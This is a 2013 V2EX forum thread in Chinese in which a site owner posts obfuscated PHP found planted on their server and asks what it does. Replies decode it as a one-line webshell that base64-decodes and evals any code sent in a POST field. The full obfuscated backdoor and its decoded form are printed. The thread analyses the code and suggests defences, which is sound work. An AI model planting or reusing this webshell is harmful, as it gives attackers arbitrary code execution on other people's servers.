网站被植入这样的代码,能翻译下么?想知道他是干嘛的。。

2013 年 1 月 29 日
 isy
<?php //cb6f82f3e4007bdaccf419abafab94c8
$_=
//system file do not delete
'CmlmKGlzc2V0KCRfUE9TVFsiY29kZSJdKSkKewogICAgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29kZSJdKSk7Cn0=';
//system file do not delete
$__ = "JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCRfKTsKZXZhbCgkY29kZSk7";$___ = "\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";eval($___($__));
4874 次点击
所在节点    问与答
13 条回复
mechille
2013 年 1 月 29 日
空间商植入的?
isy
2013 年 1 月 29 日
@mechille 应该是利用上传漏洞上传的。
clww
2013 年 1 月 29 日
if(isset($_POST["code"]))
{
eval(base64_decode($_POST["code"]));
}
C0VN
2013 年 1 月 29 日
base64 编码
isy
2013 年 1 月 29 日
@clww @xavierskip 后面这段呢?

$___ = "\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";
isy
2013 年 1 月 29 日
明白了。。

$___ = "\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65"; 等于 base64_decode
nazor
2013 年 1 月 29 日
是比较加密过的一句话。
shinwood
2013 年 1 月 29 日
可以执行任意PHP代码的一个Hook。
SuperOS
2013 年 1 月 29 日
webshell 服务器端
solo7net
2013 年 1 月 29 日
传说中的一句话马?
inroading
2013 年 1 月 30 日
一字马
holystrike
2013 年 1 月 30 日
服务器上把eval函数禁了
mozutaba
2013 年 2 月 3 日
一句话,dangrous没拼错吧

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://study.congcong.us/t/59141

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX